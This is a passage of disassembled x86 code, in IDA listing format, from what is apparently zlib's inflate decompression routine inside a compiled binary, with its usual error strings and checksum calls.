jz short loc_9AE92A
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aInvalidStoredB ; "invalid stored block lengths"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AE92A: ; CODE XREF: sub_9AE1BD+75C�j
xor ebx, ebx
mov [esi+40h], eax
mov [ebp+var_10], ebx
xor edi, edi
mov dword ptr [esi], 0Eh
loc_9AE93A: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF365�o
mov eax, [esi+40h]
test eax, eax
mov [ebp+var_C], eax
jz loc_9AE790
mov eax, [ebp+var_8]
cmp [ebp+var_C], eax
jbe short loc_9AE953
mov [ebp+var_C], eax
loc_9AE953: ; CODE XREF: sub_9AE1BD+791�j
mov eax, [ebp+var_14]
cmp [ebp+var_C], eax
jbe short loc_9AE95E
mov [ebp+var_C], eax
loc_9AE95E: ; CODE XREF: sub_9AE1BD+79C�j
cmp [ebp+var_C], 0
jz loc_9AF24B
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_1C]
call sub_9B323A ; memcpy
mov eax, [ebp+var_C]
sub [ebp+var_8], eax
add [ebp+var_4], eax
sub [ebp+var_14], eax
add [ebp+var_1C], eax
add esp, 0Ch
sub [esi+40h], eax
jmp loc_9AF1FD
; ---------------------------------------------------------------------------
loc_9AE990: ; CODE XREF: sub_9AE1BD+7F5�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
add edi, 8
loc_9AE9AF: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF369�o
cmp edi, 0Eh
jb short loc_9AE990
mov eax, ebx
and eax, 1Fh
add eax, 101h
mov [esi+60h], eax
shr ebx, 5
mov eax, ebx
and eax, 1Fh
inc eax
shr ebx, 5
mov [esi+64h], eax
mov eax, ebx
and eax, 0Fh
add eax, 4
shr ebx, 4
sub edi, 0Eh
cmp dword ptr [esi+60h], 11Eh
mov [esi+5Ch], eax
mov [ebp+var_10], ebx
ja short loc_9AE9FF
cmp dword ptr [esi+64h], 1Eh
ja short loc_9AE9FF
and dword ptr [esi+68h], 0
mov dword ptr [esi], 10h
jmp short loc_9AEA55
; ---------------------------------------------------------------------------
loc_9AE9FF: ; CODE XREF: sub_9AE1BD+82E�j
; sub_9AE1BD+834�j
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aTooManyLengthO ; "too many length or distance symbols"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AEA0E: ; CODE XREF: sub_9AE1BD+873�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
add edi, 8
loc_9AEA2D: ; CODE XREF: sub_9AE1BD+89E�j
cmp edi, 3
jb short loc_9AEA0E
mov ecx, [esi+68h]
movzx ecx, word_9A4B00[ecx*2]
xor eax, eax
mov al, bl
shr ebx, 3
mov [ebp+var_10], ebx
and eax, 7
mov [esi+ecx*2+70h], ax
inc dword ptr [esi+68h]
sub edi, 3
loc_9AEA55: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; sub_9AE1BD+840�j
; DATA XREF: ...
mov eax, [esi+68h]
cmp eax, [esi+5Ch]
jb short loc_9AEA2D
jmp short loc_9AEA73
; ---------------------------------------------------------------------------
loc_9AEA5F: ; CODE XREF: sub_9AE1BD+8BA�j
mov eax, [esi+68h]
movzx eax, word_9A4B00[eax*2]
and word ptr [esi+eax*2+70h], 0
inc dword ptr [esi+68h]
loc_9AEA73: ; CODE XREF: sub_9AE1BD+8A0�j
cmp dword ptr [esi+68h], 13h
jb short loc_9AEA5F
lea eax, [esi+530h]
lea ecx, [esi+6Ch]
mov [ecx], eax
mov [esi+4Ch], eax
lea edx, [esi+2F0h]
push edx
lea eax, [esi+54h]
push eax
push ecx
mov dword ptr [eax], 7
push 13h
lea eax, [esi+70h]
push eax
push 0
call sub_9AFDE7
add esp, 18h
test eax, eax
mov [ebp+var_24], eax
jz short loc_9AEABF
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aInvalidCodeLen ; "invalid code lengths set"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AEABF: ; CODE XREF: sub_9AE1BD+8F1�j
and dword ptr [esi+68h], 0
mov dword ptr [esi], 11h
jmp loc_9AEC5C
; ---------------------------------------------------------------------------
loc_9AEACE: ; CODE XREF: sub_9AE1BD+949�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
add edi, 8
loc_9AEAED: ; CODE XREF: sub_9AE1BD+AA8�j
mov ecx, [esi+54h]
xor eax, eax
inc eax
shl eax, cl
mov ecx, [esi+4Ch]
dec eax
and eax, ebx
mov eax, [ecx+eax*4]
movzx ecx, ah
cmp ecx, edi
mov [ebp+var_C], eax
ja short loc_9AEACE
cmp word ptr [ebp+var_C+2], 10h
jnb short loc_9AEB54
movzx eax, ah
jmp short loc_9AEB33
; ---------------------------------------------------------------------------
loc_9AEB14: ; CODE XREF: sub_9AE1BD+978�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov ecx, [ebp+var_4]
movzx edx, byte ptr [ecx]
dec [ebp+var_8]
mov ecx, edi
shl edx, cl
add ebx, edx
inc [ebp+var_4]
add edi, 8
loc_9AEB33: ; CODE XREF: sub_9AE1BD+955�j
cmp edi, eax
jb short loc_9AEB14
mov ecx, eax
shr ebx, cl
mov cx, word ptr [ebp+var_C+2]
sub edi, eax
mov eax, [esi+68h]
mov [esi+eax*2+70h], cx
inc dword ptr [esi+68h]
mov [ebp+var_10], ebx
jmp loc_9AEC5C
; ---------------------------------------------------------------------------
loc_9AEB54: ; CODE XREF: sub_9AE1BD+950�j
jnz short loc_9AEBAF
movzx eax, ah
jmp short loc_9AEB7A
; ---------------------------------------------------------------------------
loc_9AEB5B: ; CODE XREF: sub_9AE1BD+9C2�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov ecx, [ebp+var_4]
movzx edx, byte ptr [ecx]
dec [ebp+var_8]
mov ecx, edi
shl edx, cl
add ebx, edx
inc [ebp+var_4]
add edi, 8
loc_9AEB7A: ; CODE XREF: sub_9AE1BD+99C�j
lea ecx, [eax+2]
cmp edi, ecx
jb short loc_9AEB5B
mov ecx, eax
shr ebx, cl
sub edi, eax
mov eax, [esi+68h]
test eax, eax
mov [ebp+var_10], ebx
jz loc_9AEC6D
movzx eax, word ptr [esi+eax*2+6Eh]
mov [ebp+var_28], eax
mov eax, ebx
and eax, 3
add eax, 3
shr ebx, 2
dec edi
dec edi
jmp loc_9AEC34
; ---------------------------------------------------------------------------
loc_9AEBAF: ; CODE XREF: sub_9AE1BD:loc_9AEB54�j
cmp word ptr [ebp+var_C+2], 11h
movzx edx, ah
jnz short loc_9AEC13
jmp short loc_9AEBDA
; ---------------------------------------------------------------------------
loc_9AEBBB: ; CODE XREF: sub_9AE1BD+A22�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
add edi, 8
loc_9AEBDA: ; CODE XREF: sub_9AE1BD+9FC�j
lea eax, [edx+3]
cmp edi, eax
jb short loc_9AEBBB
mov ecx, edx
shr ebx, cl
push 0FFFFFFFDh
mov eax, ebx
and eax, 7
add eax, 3
shr ebx, 3
jmp short loc_9AEC2B
; ---------------------------------------------------------------------------
loc_9AEBF4: ; CODE XREF: sub_9AE1BD+A5B�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
add edi, 8
loc_9AEC13: ; CODE XREF: sub_9AE1BD+9FA�j
lea eax, [edx+7]
cmp edi, eax
jb short loc_9AEBF4
mov ecx, edx
shr ebx, cl
push 0FFFFFFF9h
mov eax, ebx
and eax, 7Fh
add eax, 0Bh
shr ebx, 7
loc_9AEC2B: ; CODE XREF: sub_9AE1BD+A35�j
and [ebp+var_28], 0
pop ecx
sub ecx, edx
add edi, ecx
loc_9AEC34: ; CODE XREF: sub_9AE1BD+9ED�j
mov ecx, [esi+64h]
mov edx, [esi+68h]
add ecx, [esi+60h]
add edx, eax
cmp edx, ecx
mov [ebp+var_10], ebx
ja short loc_9AEC7C
test eax, eax
jz short loc_9AEC5C
loc_9AEC4A: ; CODE XREF: sub_9AE1BD+A9D�j
mov ecx, [esi+68h]
mov dx, word ptr [ebp+var_28]
mov [esi+ecx*2+70h], dx
inc dword ptr [esi+68h]
dec eax
jnz short loc_9AEC4A
loc_9AEC5C: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; sub_9AE1BD+90C�j ...
mov eax, [esi+64h]
add eax, [esi+60h]
cmp [esi+68h], eax
jb loc_9AEAED
jmp short loc_9AEC8C
; ---------------------------------------------------------------------------
loc_9AEC6D: ; CODE XREF: sub_9AE1BD+9D2�j
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aInvalidBitLeng ; "invalid bit length repeat"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AEC7C: ; CODE XREF: sub_9AE1BD+A87�j
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aInvalidBitLeng ; "invalid bit length repeat"
mov dword ptr [esi], 1Bh
loc_9AEC8C: ; CODE XREF: sub_9AE1BD+AAE�j
cmp dword ptr [esi], 1Bh
jz loc_9AF1FD
lea eax, [esi+530h]
lea ecx, [esi+6Ch]
mov [ecx], eax
mov [esi+4Ch], eax
lea edx, [esi+2F0h]
push edx
lea eax, [esi+54h]
push eax
push ecx
push dword ptr [esi+60h]
mov dword ptr [eax], 9
lea eax, [esi+70h]
push eax
push 1
call sub_9AFDE7
add esp, 18h
test eax, eax
mov [ebp+var_24], eax
jz short loc_9AECDC
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aInvalidLiteral ; "invalid literal/lengths set"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AECDC: ; CODE XREF: sub_9AE1BD+B0E�j
lea ecx, [esi+6Ch]
mov eax, [ecx]
mov [esi+50h], eax
lea edx, [esi+2F0h]
push edx
lea eax, [esi+58h]
push eax
push ecx
push dword ptr [esi+64h]
mov dword ptr [eax], 6
mov eax, [esi+60h]
lea eax, [esi+eax*2+70h]
push eax
push 2
call sub_9AFDE7
add esp, 18h
test eax, eax
mov [ebp+var_24], eax
jz short loc_9AED21
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aInvalidDistanc ; "invalid distances set"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AED21: ; CODE XREF: sub_9AE1BD+B53�j
mov dword ptr [esi], 12h
loc_9AED27: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF375�o
cmp [ebp+var_8], 6
jb short loc_9AED89
cmp [ebp+var_14], 102h
jb short loc_9AED89
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_1C]
push [ebp+var_20]
mov [eax+0Ch], ecx
mov ecx, [ebp+var_14]
mov [eax+10h], ecx
mov ecx, [ebp+var_4]
mov [eax], ecx
mov ecx, [ebp+var_8]
mov [eax+4], ecx
push eax
mov [esi+38h], ebx
mov [esi+3Ch], edi
call sub_9AFA38
mov eax, [ebp+arg_0]
mov ebx, [esi+38h]
mov edi, [esi+3Ch]
pop ecx
pop ecx
mov ecx, [eax+0Ch]
mov [ebp+var_1C], ecx
mov ecx, [eax+10h]
mov [ebp+var_14], ecx
mov ecx, [eax]
mov eax, [eax+4]
mov [ebp+var_4], ecx
mov [ebp+var_8], eax
mov [ebp+var_10], ebx
jmp loc_9AF1FD
; ---------------------------------------------------------------------------
loc_9AED89: ; CODE XREF: sub_9AE1BD+B6E�j
; sub_9AE1BD+B77�j
mov ecx, [esi+54h]
mov edx, [esi+4Ch]
xor eax, eax
inc eax
shl eax, cl
dec eax
and eax, ebx
mov eax, [edx+eax*4]
jmp short loc_9AEDCC
; ---------------------------------------------------------------------------
loc_9AED9C: ; CODE XREF: sub_9AE1BD+C17�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
mov ecx, [esi+54h]
add edi, 8
add ebx, eax
inc [ebp+var_4]
xor eax, eax
inc eax
shl eax, cl
mov ecx, [esi+4Ch]
dec eax
and eax, ebx
mov eax, [ecx+eax*4]
loc_9AEDCC: ; CODE XREF: sub_9AE1BD+BDD�j
movzx ecx, ah
cmp ecx, edi
mov [ebp+var_C], eax
ja short loc_9AED9C
test al, al
jz loc_9AEE5E
test al, 0F0h
jnz short loc_9AEE5E
movzx ecx, ah
mov [ebp+var_10], ecx
xor ecx, ecx
mov cl, al
mov [ebp+var_28], eax
xor eax, eax
inc eax
add ecx, [ebp+var_10]
shl eax, cl
mov ecx, [ebp+var_10]
dec eax
and eax, ebx
shr eax, cl
movzx ecx, word ptr [ebp+var_C+2]
add eax, ecx
mov eax, [edx+eax*4]
movzx edx, byte ptr [ebp+var_28+1]
jmp short loc_9AEE4C
; ---------------------------------------------------------------------------
loc_9AEE0E: ; CODE XREF: sub_9AE1BD+C99�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
xor ecx, ecx
mov cl, byte ptr [ebp+var_28]
add edi, 8
add ebx, eax
inc [ebp+var_4]
xor eax, eax
inc eax
add ecx, edx
shl eax, cl
mov ecx, edx
dec eax
and eax, ebx
shr eax, cl
movzx ecx, word ptr [ebp+var_28+2]
add eax, ecx
mov ecx, [esi+4Ch]
mov eax, [ecx+eax*4]
loc_9AEE4C: ; CODE XREF: sub_9AE1BD+C4F�j
movzx ecx, ah
add ecx, edx
cmp ecx, edi
mov [ebp+var_C], eax
ja short loc_9AEE0E
mov ecx, edx
shr ebx, cl
sub edi, edx
loc_9AEE5E: ; CODE XREF: sub_9AE1BD+C1B�j
; sub_9AE1BD+C23�j
movzx ecx, ah
shr ebx, cl
sub edi, ecx
test al, al
movzx ecx, word ptr [ebp+var_C+2]
mov [ebp+var_10], ebx
mov [esi+40h], ecx
jnz short loc_9AEE7E
mov dword ptr [esi], 17h
jmp loc_9AF1FD
; ---------------------------------------------------------------------------
loc_9AEE7E: ; CODE XREF: sub_9AE1BD+CB4�j
test al, 20h
jnz loc_9AE790
test al, 40h
jz short loc_9AEE99
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aInvalidLiter_0 ; "invalid literal/length code"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AEE99: ; CODE XREF: sub_9AE1BD+CCB�j
and eax, 0Fh
mov [esi+48h], eax
mov dword ptr [esi], 13h
loc_9AEEA5: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF379�o
mov eax, [esi+48h]
test eax, eax
jz short loc_9AEEE5
cmp edi, eax
jnb short loc_9AEED4
loc_9AEEB0: ; CODE XREF: sub_9AE1BD+D15�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov ecx, [ebp+var_4]
movzx edx, byte ptr [ecx]
dec [ebp+var_8]
mov ecx, edi
shl edx, cl
add edi, 8
add ebx, edx
inc [ebp+var_4]
cmp edi, [esi+48h]
jb short loc_9AEEB0
loc_9AEED4: ; CODE XREF: sub_9AE1BD+CF1�j
xor edx, edx
inc edx
mov ecx, eax
shl edx, cl
dec edx
and edx, ebx
add [esi+40h], edx
shr ebx, cl
sub edi, eax
loc_9AEEE5: ; CODE XREF: sub_9AE1BD+CED�j
mov dword ptr [esi], 14h
loc_9AEEEB: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF37D�o
mov ecx, [esi+58h]
mov edx, [esi+50h]
xor eax, eax
inc eax
shl eax, cl
dec eax
and eax, ebx
mov eax, [edx+eax*4]
jmp short loc_9AEF2E
; ---------------------------------------------------------------------------
loc_9AEEFE: ; CODE XREF: sub_9AE1BD+D79�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
mov ecx, [esi+58h]
add edi, 8
add ebx, eax
inc [ebp+var_4]
xor eax, eax
inc eax
shl eax, cl
mov ecx, [esi+50h]
dec eax
and eax, ebx
mov eax, [ecx+eax*4]
loc_9AEF2E: ; CODE XREF: sub_9AE1BD+D3F�j
movzx ecx, ah
cmp ecx, edi
mov [ebp+var_C], eax
ja short loc_9AEEFE
test al, 0F0h
jnz short loc_9AEFB8
movzx ecx, ah
mov [ebp+var_10], ecx
xor ecx, ecx
mov cl, al
mov [ebp+var_28], eax
xor eax, eax
inc eax
add ecx, [ebp+var_10]
shl eax, cl
mov ecx, [ebp+var_10]
dec eax
and eax, ebx
shr eax, cl
movzx ecx, word ptr [ebp+var_C+2]
add eax, ecx
mov eax, [edx+eax*4]
movzx edx, byte ptr [ebp+var_28+1]
jmp short loc_9AEFA6
; ---------------------------------------------------------------------------
loc_9AEF68: ; CODE XREF: sub_9AE1BD+DF3�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
xor ecx, ecx
mov cl, byte ptr [ebp+var_28]
add edi, 8
add ebx, eax
inc [ebp+var_4]
xor eax, eax
inc eax
add ecx, edx
shl eax, cl
mov ecx, edx
dec eax
and eax, ebx
shr eax, cl
movzx ecx, word ptr [ebp+var_28+2]
add eax, ecx
mov ecx, [esi+50h]
mov eax, [ecx+eax*4]
loc_9AEFA6: ; CODE XREF: sub_9AE1BD+DA9�j
movzx ecx, ah
add ecx, edx
cmp ecx, edi
mov [ebp+var_C], eax
ja short loc_9AEF68
mov ecx, edx
shr ebx, cl
sub edi, edx
loc_9AEFB8: ; CODE XREF: sub_9AE1BD+D7D�j
movzx ecx, ah
shr ebx, cl
sub edi, ecx
test al, 40h
mov [ebp+var_10], ebx
jz short loc_9AEFD5
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aInvalidDista_0 ; "invalid distance code"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AEFD5: ; CODE XREF: sub_9AE1BD+E07�j
movzx ecx, word ptr [ebp+var_C+2]
and eax, 0Fh
mov [esi+44h], ecx
mov [esi+48h], eax
mov dword ptr [esi], 15h
loc_9AEFE8: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF381�o
mov eax, [esi+48h]
test eax, eax
jz short loc_9AF02B
cmp edi, eax
jnb short loc_9AF017
loc_9AEFF3: ; CODE XREF: sub_9AE1BD+E58�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov ecx, [ebp+var_4]
movzx edx, byte ptr [ecx]
dec [ebp+var_8]
mov ecx, edi
shl edx, cl
add edi, 8
add ebx, edx
inc [ebp+var_4]
cmp edi, [esi+48h]
jb short loc_9AEFF3
loc_9AF017: ; CODE XREF: sub_9AE1BD+E34�j
xor edx, edx
inc edx
mov ecx, eax
shl edx, cl
dec edx
and edx, ebx
add [esi+44h], edx
shr ebx, cl
sub edi, eax
mov [ebp+var_10], ebx
loc_9AF02B: ; CODE XREF: sub_9AE1BD+E30�j
mov eax, [esi+2Ch]
sub eax, [ebp+var_14]
add eax, [ebp+var_20]
cmp [esi+44h], eax
jbe short loc_9AF048
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aInvalidDista_1 ; "invalid distance too far back"
jmp loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AF048: ; CODE XREF: sub_9AE1BD+E7A�j
mov dword ptr [esi], 16h
loc_9AF04E: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF385�o
cmp [ebp+var_14], 0
jz loc_9AF24B
mov eax, [ebp+var_20]
sub eax, [ebp+var_14]
mov ecx, [esi+44h]
cmp ecx, eax
jbe short loc_9AF092
sub ecx, eax
mov eax, [esi+34h]
mov [ebp+var_C], ecx
mov ecx, [esi+30h]
cmp [ebp+var_C], ecx
jbe short loc_9AF080
add eax, [esi+28h]
sub [ebp+var_C], ecx
sub eax, [ebp+var_C]
jmp short loc_9AF085
; ---------------------------------------------------------------------------
loc_9AF080: ; CODE XREF: sub_9AE1BD+EB6�j
sub eax, [ebp+var_C]
add eax, ecx
loc_9AF085: ; CODE XREF: sub_9AE1BD+EC1�j
mov ecx, [esi+40h]
cmp [ebp+var_C], ecx
mov [ebp+var_28], ecx
jbe short loc_9AF0A0
jmp short loc_9AF09D
; ---------------------------------------------------------------------------
loc_9AF092: ; CODE XREF: sub_9AE1BD+EA6�j
mov eax, [ebp+var_1C]
sub eax, ecx
mov ecx, [esi+40h]
mov [ebp+var_28], ecx
loc_9AF09D: ; CODE XREF: sub_9AE1BD+ED3�j
mov [ebp+var_C], ecx
loc_9AF0A0: ; CODE XREF: sub_9AE1BD+ED1�j
mov ecx, [ebp+var_14]
cmp [ebp+var_C], ecx
jbe short loc_9AF0AB
mov [ebp+var_C], ecx
loc_9AF0AB: ; CODE XREF: sub_9AE1BD+EE9�j
sub ecx, [ebp+var_C]
mov [ebp+var_14], ecx
mov ecx, [ebp+var_28]
sub ecx, [ebp+var_C]
mov [esi+40h], ecx
loc_9AF0BA: ; CODE XREF: sub_9AE1BD+F0B�j
mov edx, [ebp+var_1C]
mov cl, [eax]
inc [ebp+var_1C]
inc eax
dec [ebp+var_C]
mov [edx], cl
jnz short loc_9AF0BA
cmp dword ptr [esi+40h], 0
jnz loc_9AF1FD
loc_9AF0D4: ; CODE XREF: sub_9AE1BD+F3A�j
mov dword ptr [esi], 12h
jmp loc_9AF1FD
; ---------------------------------------------------------------------------
loc_9AF0DF: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF389�o
cmp [ebp+var_14], 0
jz loc_9AF24B
mov ecx, [ebp+var_1C]
mov al, [esi+40h]
inc [ebp+var_1C]
dec [ebp+var_14]
mov [ecx], al
jmp short loc_9AF0D4
; ---------------------------------------------------------------------------
loc_9AF0F9: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF38D�o
cmp dword ptr [esi+8], 0
jz loc_9AF1AD
jmp short loc_9AF127
; ---------------------------------------------------------------------------
loc_9AF105: ; CODE XREF: sub_9AE1BD+F6D�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
mov [ebp+var_10], ebx
add edi, 8
loc_9AF127: ; CODE XREF: sub_9AE1BD+F46�j
cmp edi, 20h
jb short loc_9AF105
mov eax, [ebp+var_20]
sub eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
add [ecx+14h], eax
add [esi+1Ch], eax
test eax, eax
mov [ebp+var_20], eax
jz short loc_9AF16D
mov eax, [ebp+var_1C]
push [ebp+var_20]
sub eax, [ebp+var_20]
cmp dword ptr [esi+10h], 0
push eax
push dword ptr [esi+18h]
jz short loc_9AF15C
call sub_9AD46B
jmp short loc_9AF161
; ---------------------------------------------------------------------------
loc_9AF15C: ; CODE XREF: sub_9AE1BD+F96�j
call sub_9ACEF5
loc_9AF161: ; CODE XREF: sub_9AE1BD+F9D�j
mov ecx, [ebp+arg_0]
mov [esi+18h], eax
add esp, 0Ch
mov [ecx+30h], eax
loc_9AF16D: ; CODE XREF: sub_9AE1BD+F83�j
cmp dword ptr [esi+10h], 0
mov eax, [ebp+var_14]
mov [ebp+var_20], eax
mov eax, ebx
jnz short loc_9AF198
and eax, 0FF00h
mov edx, ebx
shl edx, 10h
add eax, edx
xor edx, edx
mov dh, byte ptr [ebp+var_10+2]
shl eax, 8
add eax, edx
mov edx, ebx
shr edx, 18h
add eax, edx
loc_9AF198: ; CODE XREF: sub_9AE1BD+FBC�j
cmp eax, [esi+18h]
jz short loc_9AF1A6
mov dword ptr [ecx+18h], offset aIncorrectDataC ; "incorrect data check"
jmp short loc_9AF1F7
; ---------------------------------------------------------------------------
loc_9AF1A6: ; CODE XREF: sub_9AE1BD+FDE�j
xor ebx, ebx
mov [ebp+var_10], ebx
xor edi, edi
loc_9AF1AD: ; CODE XREF: sub_9AE1BD+F40�j
mov dword ptr [esi], 19h
loc_9AF1B3: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF391�o
cmp dword ptr [esi+8], 0
jz short loc_9AF235
cmp dword ptr [esi+10h], 0
jz short loc_9AF235
jmp short loc_9AF1E3
; ---------------------------------------------------------------------------
loc_9AF1C1: ; CODE XREF: sub_9AE1BD+1029�j
cmp [ebp+var_8], 0
jz loc_9AF24B
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
dec [ebp+var_8]
mov ecx, edi
shl eax, cl
add ebx, eax
inc [ebp+var_4]
mov [ebp+var_10], ebx
add edi, 8
loc_9AF1E3: ; CODE XREF: sub_9AE1BD+1002�j
cmp edi, 20h
jb short loc_9AF1C1
cmp ebx, [esi+1Ch]
jz short loc_9AF231
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aIncorrectLengt ; "incorrect length check"
loc_9AF1F7: ; CODE XREF: sub_9AE1BD+156�j
; sub_9AE1BD+19A�j ...
mov dword ptr [esi], 1Bh
loc_9AF1FD: ; CODE XREF: sub_9AE1BD+6B�j
; sub_9AE1BD+84�j ...
mov eax, [esi]
cmp eax, 1Ch
jbe loc_9AE22D
loc_9AF208: ; CODE XREF: sub_9AE1BD+10�j
; sub_9AE1BD+1B�j ...
push 0FFFFFFFEh
loc_9AF20A: ; CODE XREF: sub_9AE1BD+1072�j
; sub_9AE1BD+10DB�j
pop eax
loc_9AF20B: ; CODE XREF: sub_9AE1BD+116B�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9AF210: ; CODE XREF: sub_9AE1BD+63E�j
mov eax, [ebp+var_1C]
mov [ecx+0Ch], eax
mov eax, [ebp+var_14]
mov [ecx+10h], eax
mov eax, [ebp+var_4]
mov [ecx], eax
mov eax, [ebp+var_8]
mov [ecx+4], eax
mov [esi+38h], ebx
mov [esi+3Ch], edi
push 2
jmp short loc_9AF20A
; ---------------------------------------------------------------------------
loc_9AF231: ; CODE XREF: sub_9AE1BD+102E�j
xor ebx, ebx
xor edi, edi
loc_9AF235: ; CODE XREF: sub_9AE1BD+FFA�j
; sub_9AE1BD+1000�j
mov dword ptr [esi], 1Ah
loc_9AF23B: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF395�o
mov [ebp+var_24], 1
jmp short loc_9AF24B
; ---------------------------------------------------------------------------
loc_9AF244: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF399�o
mov [ebp+var_24], 0FFFFFFFDh
loc_9AF24B: ; CODE XREF: sub_9AE1BD+8D�j
; sub_9AE1BD+1A3�j ...
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_1C]
mov [eax+0Ch], ecx
mov ecx, [ebp+var_14]
mov [eax+10h], ecx
mov ecx, [ebp+var_4]
mov [eax], ecx
mov ecx, [ebp+var_8]
mov [eax+4], ecx
cmp dword ptr [esi+28h], 0
mov [esi+38h], ebx
mov [esi+3Ch], edi
jnz short loc_9AF281
cmp dword ptr [esi], 18h
jge short loc_9AF29D
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_0]
cmp eax, [ecx+10h]
jz short loc_9AF29D
loc_9AF281: ; CODE XREF: sub_9AE1BD+10B2�j
mov eax, [ebp+var_20]
mov edi, [ebp+arg_0]
call sub_9AE0E5
test eax, eax
jz short loc_9AF29D
mov dword ptr [esi], 1Ch
loc_9AF296: ; CODE XREF: sub_9AE1BD:loc_9AE22D�j
; DATA XREF: .text:009AF39D�o
push 0FFFFFFFCh
jmp loc_9AF20A
; ---------------------------------------------------------------------------
loc_9AF29D: ; CODE XREF: sub_9AE1BD+10B7�j
; sub_9AE1BD+10C2�j ...
mov edi, [ebp+arg_0]
mov eax, [ebp+var_2C]
sub eax, [edi+4]
mov ebx, [ebp+var_20]
sub ebx, [edi+10h]
add [edi+8], eax
add [edi+14h], ebx
add [esi+1Ch], ebx
cmp dword ptr [esi+8], 0
mov [ebp+var_2C], eax
jz short loc_9AF2EA
test ebx, ebx
jz short loc_9AF2EA
mov eax, [edi+0Ch]
push ebx
sub eax, ebx
cmp dword ptr [esi+10h], 0
push eax
push dword ptr [esi+18h]
jz short loc_9AF2D9
call sub_9AD46B
jmp short loc_9AF2DE
; ---------------------------------------------------------------------------
loc_9AF2D9: ; CODE XREF: sub_9AE1BD+1113�j
call sub_9ACEF5
loc_9AF2DE: ; CODE XREF: sub_9AE1BD+111A�j
mov [esi+18h], eax
mov [edi+30h], eax
mov eax, [ebp+var_2C]
add esp, 0Ch
loc_9AF2EA: ; CODE XREF: sub_9AE1BD+10FF�j
; sub_9AE1BD+1103�j
cmp dword ptr [esi], 0Bh
jnz short loc_9AF2F6
mov ecx, 80h
jmp short loc_9AF2F8
; ---------------------------------------------------------------------------
